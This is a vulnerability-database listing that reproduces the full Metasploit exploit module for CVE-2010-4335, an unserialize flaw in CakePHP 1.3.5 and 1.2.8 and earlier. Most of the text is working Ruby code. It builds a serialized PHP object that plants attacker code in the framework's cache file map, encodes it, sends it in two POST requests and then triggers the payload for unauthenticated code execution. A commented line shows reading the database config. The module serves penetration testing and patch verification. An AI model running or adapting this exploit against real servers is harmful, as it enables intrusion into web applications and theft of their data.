CakePHP Cache Corruption Code Execution

2010-11-19T18:30:07
ID MSF:EXPLOIT/UNIX/WEBAPP/CAKEPHP_CACHE_CORRUPTION
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

CakePHP is a popular PHP framework for building web applications. The Security component of CakePHP versions 1.3.5 and earlier and 1.2.8 and earlier is vulnerable to an unserialize attack which could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CakePHP Cache Corruption Code Execution',
      'Description'    => %q{
        CakePHP is a popular PHP framework for building web applications.  The
        Security component of CakePHP versions 1.3.5 and earlier and 1.2.8 and
        earlier is vulnerable to an unserialize attack which could be abused to
        allow unauthenticated attackers to execute arbitrary code with the
        permissions of the webserver.
      },
      'Author'	=>
        [
          'tdz',
          'Felix Wilhelm', # poc
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '69352' ],
          [ 'CVE', '2010-4335' ],
          [ 'BID', '44852'  ],
          [ 'PACKETSTORM', '95847' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'Space'       => 4000,
          # max url length for some old versions of apache according to
          # http://www.boutell.com/newfaq/misc/urllength.html
          'DisableNops' => true,
          #'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          'Keys'        => ['php'],
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 15 2010'
      ))

      register_options(
        [
          OptString.new('URI',	[ true, "CakePHP POST path", '/']),
          OptString.new('OptionalPostData',	[ false, "Optional POST data", '']),
        ])
  end


  def exploit
    #path = rand_text_alphanumeric(rand(5)+5)
    key = rand_text_alphanumeric(rand(5)+5)
    fields = rand_text_alphanumeric(rand(5)+5)

    #payload =  "readfile('../config/database.php'); exit();"
    len=payload.encoded.length + 6

    p = ""
    p << ':O:3:"App":4:{s:7:"__cache";s:3:"bam";s:5:"__map";a:2:{s:4'
    p << ':"Core";a:1:{s:6:"Router";s:42:"../tmp/cache/persistent/cake_core_file_map";}'
    p << 's:3:"Foo";s:'
    p << len.to_s()
    p << ':"<? '
    p << payload.encoded
    p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'

    #rot13 and urlencode
    p = p.tr("A-Ma-mN-Zn-z","N-Zn-zA-Ma-m")
    p = CGI.escape(p)

    data = "data%5b_Token%5d%5bkey%5d="
    data << key
    data << "&data%5b_Token%5d%5bfields%5d="
    data << fields
    data << p
    data << "&_method=POST"

    #some apps need the form post data
    if datastore['OptionalPostData']
      postdata = CGI.escape(datastore['OptionalPostData'])
      data << "&"
      data << postdata
    end

    print_status("Sending exploit request 1")
    res = send_request_cgi(
    {
      'uri'    => normalize_uri(datastore['URI']),
      'method' => "POST",
      'ctype' => 'application/x-www-form-urlencoded',
      'data'   => data
    }, 5)

    print_status("Sending exploit request 2")
    res = send_request_cgi(
    {
      'uri'    => normalize_uri(datastore['URI']),
      'method' => "POST",
      'ctype' => 'application/x-www-form-urlencoded',
      'data'   => data
    },5)

    print_status("Requesting our payload")
    response = send_request_raw({
      # Allow findsock payloads to work
      'global' => true,
      'uri' => normalize_uri(datastore['URI'])
    }, 5)

    handler
  end
end